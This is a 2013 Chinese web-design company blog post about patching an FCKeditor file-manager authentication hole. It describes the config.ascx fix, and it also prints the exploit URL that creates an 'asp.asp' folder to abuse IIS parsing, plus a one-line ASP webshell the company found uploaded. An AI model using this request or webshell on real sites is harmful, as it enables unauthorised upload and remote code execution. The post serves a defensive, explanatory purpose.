公司使命:打造嘉兴技术实力最强的网络公司
服务项目:嘉兴网站建设 嘉兴网站制作 嘉兴网站优化
新闻中心

fckeditor创建文件夹文件漏洞修补

发布时间:2013/11/22 10:18:38   文章来源:jiaxingweb   浏览:[  ]   评论:[  ]
    fckeditor是目前最好用的开源编辑器,开源的好处是可以修改代码(后台登陆安全验证代码)来提高安全性。
 
    然在fckeditor的2.6版本之上在文件中就集成了安全验证的内容。在fckeditor目录下editor\filemanager\connectors\aspx\config.ascx。config.ascx文件中CheckAuthentication方法。在默认情况下返回的是true。通过修改返回修改为return ( Session[ "IsAuthorized" ] != null && (bool)Session[ "IsAuthorized" ] == true );再把网站后台登陆通过后赋值给Session[ "IsAuthorized" ]=true。这样就可以增加了fckeditor的上传验证。
 
    之前我司的网站没有修改上面的“方法”导致可以通过代码直接上传,代码如下:
域名/Fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=file&CurrentFolder=%2Fasp.asp&NewFolderName=xxx  将上面代码复制到地址栏执行结果如下图 
 
    在上传目录中生成了上图这个目录。通过对上面代码的修改应该可以生产如下图的文件
 
    在20134113094105.jpg文件中,我们用记事本打开,如下图
 
    在上图中我们可以看到这样的代码<% if request("#")<>"" then Execute(request("#")) %>  说这是一句话木马,具体什么运行不太清楚。
 
    到这就可以看到fckeditor没有安全验证的话,黑客可以轻易的进入网站,并控制网站。
 
评论
发表评论
评论内容:
昵称:
邮箱:
嘉兴网络公司 嘉兴网站建设 嘉兴网站制作 嘉兴建网站 嘉兴做网站 嘉兴网页制作 PE给水管 HDPE中空壁缠绕管 ABS管生产厂家
服务热线: 0573-82102225 15858312461 QQ: 56373131 E-mail: sales@jiaxingweb.com 地址: 嘉兴市南湖区富润路101号320室 浙ICP备09050985号
嘉兴网站建设-嘉兴网站制作-嘉兴网站优化-龙媒网络@嘉兴网络公司 www.jiaxingweb.com